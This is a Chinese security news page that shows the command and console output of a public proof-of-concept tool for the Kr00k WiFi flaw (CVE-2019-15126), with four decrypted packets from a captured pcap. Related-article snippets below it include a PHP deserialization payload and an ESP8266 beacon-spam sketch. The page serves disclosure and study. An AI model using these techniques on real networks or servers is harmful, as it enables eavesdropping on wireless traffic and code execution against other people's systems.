在野出現WiFi晶片Kr00k漏洞PoC(CVE-2019-15126)

2022-01-10 嘶吼專業版

 ->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap

       /$$$$$$$   /$$$$$$   /$$$$$$  /$$       /$$

      | $$__  $$ /$$$_  $$ /$$$_  $$| $$      |__/

      | $$  \ $$| $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$

      | $$$$$$$/| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$

      | $$__  $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$

      | $$  \ $$| $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/

      | $$  | $$|  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$

      |__/  |__/ \______/  \______/ |__/  \__/|__/ \_______/

  /$$                  /$$$$$$   /$$$$$$  /$$       /$$

 | $$                 /$$$_  $$ /$$$_  $$| $$      |__/

 | $$   /$$  /$$$$$$ | $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$

 | $$  /$$/ /$$__  $$| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$

 | $$$$$$/ | $$  \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$

 | $$_  $$ | $$      | $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/

 | $$ \  $$| $$      |  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$

 |__/  \__/|__/       \______/  \______/ |__/  \__/|__/ \_______/

                                                           v0.0.1

                     https://hexway.io/research/r00kie-kr00kie/

 [*] Read packets from: encrypted_packets.pcap ....

 [*] All packets are read, packet analysis is in progress ....

 [+] Got a kr00ked packet:

 ###[ Ethernet ]###

   dst       = d4:38:9c:82:23:7a

   src       = 88:c9:d0:fb:88:d1

   type      = IPv4

 ###[ IP ]###

      version   = 4

      ihl       = 5

      tos       = 0x0

      len       = 490

      id        = 756

      flags     = DF

      frag      = 0

      ttl       = 64

      proto     = tcp

      chksum    = 0xd0ca

      src       = 192.168.43.161

      dst       = 1.1.1.1

      \options   \

 ###[ TCP ]###

         sport     = 34789

         dport     = 1337

         seq       = 3463744441

         ack       = 3909086929

         dataofs   = 8

         reserved  = 0

         flags     = PA

         window    = 1369

         chksum    = 0x65ee

         urgptr    = 0

         options   = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]

 ###[ Raw ]###

            load      = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r\n\r\n'

 [+] Got a kr00ked packet:

 ###[ Ethernet ]###

   dst       = d4:38:9c:82:23:7a

   src       = 88:c9:d0:fb:88:d1

   type      = IPv4

 ###[ IP ]###

      version   = 4

      ihl       = 5

      tos       = 0x0

      len       = 60

      id        = 42533

      flags     = DF

      frag      = 0

      ttl       = 64

      proto     = tcp

      chksum    = 0x2f47

      src       = 192.168.43.161

      dst       = 1.1.1.1

      \options   \

 ###[ TCP ]###

         sport     = 34792

         dport     = 1337

         seq       = 71773087

         ack       = 0

         dataofs   = 10

         reserved  = 0

         flags     = S

         window    = 65535

         chksum    = 0x97df

         urgptr    = 0

         options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]

 [+] Got a kr00ked packet:

 ###[ Ethernet ]###

   dst       = d4:38:9c:82:23:7a

   src       = 88:c9:d0:fb:88:d1

   type      = IPv4

 ###[ IP ]###

      version   = 4

      ihl       = 5

      tos       = 0x0

      len       = 1460

      id        = 35150

      flags     = DF

      frag      = 0

      ttl       = 64

      proto     = tcp

      chksum    = 0x46a6

      src       = 192.168.43.161

      dst       = 1.1.1.1

      \options   \

 ###[ TCP ]###

         sport     = 36020

         dport     = 1337

         seq       = 395101552

         ack       = 1111748198

         dataofs   = 8

         reserved  = 0

         flags     = A

         window    = 1369

         chksum    = 0x35d2

         urgptr    = 0

         options   = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]

 ###[ Raw ]###

            load      = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"

 [+] Got a kr00ked packet:

 ###[ Ethernet ]###

   dst       = d4:38:9c:82:23:7a

   src       = 88:c9:d0:fb:88:d1

   type      = IPv4

 ###[ IP ]###

      version   = 4

      ihl       = 5

      tos       = 0x0

      len       = 60

      id        = 17897

      flags     = DF

      frag      = 0

      ttl       = 64

      proto     = tcp

      chksum    = 0x8f83

      src       = 192.168.43.161

      dst       = 95.85.25.177

      \options   \

 ###[ TCP ]###

         sport     = 36266

         dport     = 1337

         seq       = 3375779416

         ack       = 0

         dataofs   = 10

         reserved  = 0

         flags     = S

         window    = 65535

         chksum    = 0x2c7d

         urgptr    = 0

         options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]

 [+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap

相關焦點

  • 研究機構發現Wi-Fi晶片漏洞,波及主流品牌的數十億設備!
    今天,在舊金山舉行的RSA 2020安全會議上,來自斯洛伐克防病毒公司ESET的安全研究人員將提供有關影響WiFi通信的新漏洞的詳細信息。名為Kr00k的漏洞可被攻擊者利用以攔截和解密某些類型的WiFi網絡流量(依賴WPA2連接)。
  • ESP8266製作WiFi熱點廣告機
    #include<ESP8266WiFi.h>extern "C"{ #include"user_interface.h"}void setup() { delay(500);wifi_set_opmode(STATION_MODE);wifi_promiscuous_enable(1);}void loop() {RickRoll
  • 博通WiFi晶片被曝存漏洞;中微公司2019淨利增長翻倍; 格芯將批量生產eMRAM晶片
    前有某大廠安全晶片存在可能隱患(讀者來函 | 晶片安全的相對與絕對迷思),如今博通WiFi晶片被曝漏洞,硬體層面是否存在安全的完美平衡?本土半導體設備廠商中微公司處傳來好消息,2020年國產替代能否再度提速?進入今日與非早報。
  • 爆破音k的發音教材,在學習句型中掌握語法!一個句型造句
    5、爆破音: [k] , [k] , [k] [k] [k] 。本文發布爆破音k的發音方法文字教材。要學習好英語請免費看視頻和教材。視頻教您準確發音,教材幫助您記憶單詞、句子、語法。Whatis his broth'er like?
  • i7 4790頂級處理器 聯想 揚天A8800k促銷
    (中關村在線臺式機行情)聯想 揚天 A8800k搭載了Intel 酷睿i7 4790處理器,AMD Radeon R7 240獨立顯卡,性能堪稱頂級。近日,該機(行貨)在商家「聯想電腦4S店-免費送貨」售價為9998元(含稅),購機贈送滑鼠墊。
  • 4500K?5500K?你想搞多少的一夜情?
    (唱腔自覺帶入:如此美妙……)在這裡姐想問你們一個問題,你們想一夜情是4500k ? 5500k ?4500k/5500k/6500k不是金錢,不是微量元素,也不是像素,它是指車燈的色溫。4500k一般呈現黃白光,極易導致眼睛的疲勞,進而導致身體疲勞。這個燈光下的你眼睛迷濛,想必是溫柔、浪漫的人兒。
  • 【Q&A in MRI】5.1.1 k space k 空間
    Elster, MD譯註:蔣強盛What is k-space? 什麼是 k 空間?對於許多同學而言,k 空間是一個令人「恐懼」與困惑的概念。然而完全沒有必要如此。k 空間的核心可以簡單地描述成下面一句話:k 空間是一組數字,代表著 MR 圖像的空間頻率。
  • k金戒指會掉色嗎?k金戒指發黃了怎麼辦
    K金戒指不會掉色k金戒指本身不會掉色。K金是黃金與其他金屬熔合而成的合金。所謂的k金戒指「掉色」雖然k金戒指本身不會掉色,但可能因為其他原因給人造成「掉色」的錯覺① k金戒指表面氧化k金戒指表面可能會與空氣中的某些物質,或生活中的化學物品產生氧化效應,看起來就好像是掉色一樣。
  • 你眼中一夜情是3000k?還是5000k?
    (唱腔自覺帶入:如此美妙……)在這裡哥想問情侶們一個問題,你們今晚是3000k ? 4000k ? 6500k哪一款?3000k/4000k/6500k不是金錢,不是微量元素,也不是像素,它是指光源的色溫。
  • 11代酷睿i7-11700k跑分曝光,單核超R9 5950X
    最近有人在Geekbench上發現了11代桌面酷睿i7-11700k。根據Geekbench的數據,這款i7-11700K為8核16線程,主頻3.6GHz,最高加速頻率5.0GHz,4MB二級緩存,16MB三級緩存,使用的是Z490主板。相比於現在的i7-10700K,它的基準頻率退步了200MHz,加速頻率也低了100MHz,熱設計功耗則預計維持125W。
  • [評測]Intel Core i9-10900K & i5-10600K 評測
    接口更換為全新的LGA 1200 Socket, 並搭配全新的400系列晶片組主板, 但散熱器安裝孔距維持不變. 全線標配了超線程, 配套的核芯顯卡仍為祖傳的UHD 630. 擴展方面仍然是自帶16條PCIe Gen3通道, 與晶片組之間使用DMI 3.0 x4總線通訊, 支持雙通道DDR4內存.
  • 維生素K的作用
    下面我們就來為大家具體介紹維生素k的作用。維生素k的作用1.預防骨質疏鬆兒童和青少年正是長身體的時候,需要多補充為維生素K來促進身體對鈣的吸收。2.鎮痛維生素k的功能中還有鎮痛的作用。國內還採用維生素K肌肉注射,治療膽管痙攣、胃痙攣、腸痙攣等引起的絞痛,有明顯效果,比如有報導治療膽絞痛近1000例,有效率達75%-90%。
  • 2019年6月英語六級大綱詞彙帶音標:R字母開頭
    2019年6月大學英語六級大綱詞彙帶音標:A—Z   英語六級大綱詞彙帶音標:R字母開頭   racket / 『rækit/n.球拍   radiant / 『reidjәnt/a.絢麗的;容光煥發的   radiate / 『reidieit/vi.發射光線;輻射
  • MiL.k 聯盟:基於區塊鏈的積分平臺
    MiL.k聯盟有一個解決方案,已經被一些規模較大的旅遊公司採用。何為MiL.k聯盟?MiL.k聯盟是一個區塊鏈平臺,於2019年正式啟動。平臺上有旅遊、休閒、文化或其他生活方式領域的公司,能夠共同為客戶提供服務。通過使用本地加密通證,MiL.k用戶在使用積分時擁有更多的選擇。
  • 臨床磁共振師應知「k-space」
    k-spaceWhat is k-space?對許多學生來說,k空間是一個令人恐懼和混亂的概念。不必這樣。其核心 k 空間可以簡單定義:k 空間是一個表示 MR 圖像中空間頻率的數字數組k空間作為"星系"的常見圖片表現延續了這一謎團。
  • 洋蔥代古拉k、孟婆十九、月老玄七化身非遺守護人,亮相2019國潮盛典
    12月26日,在成都天府新區西部博覽城舉辦的「2019國潮盛典」再一次將國潮推向大眾視線。此次國潮盛典是抖音和今日頭條兩大流量平臺,共同推出的年度重磅IP「國潮引擎計劃」首站。活動呈現了三場國潮大秀,將東方美學展現的淋漓盡致;同時還發布了《2019國潮指數》報告,解讀熱潮背後的底色。
  • php反序列化漏洞
    \n";print_r($lmg1);print_r(unserialize($Lmg2));?>evil中data參數為私有屬性,在序列化時會出現不可複製字符,需進行url編碼O%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A10%3A%22phpinfo
  • Golang TLS雙向身份認證DoS漏洞分析(CVE-2018-16875)
    原文作者:apisecurity翻譯來源:安全客原文連結:https://apisecurity.io/mutual-tls-authentication-vulnerability-in-go-cve-2018-16875/譯文連結:https://www.anquanke.com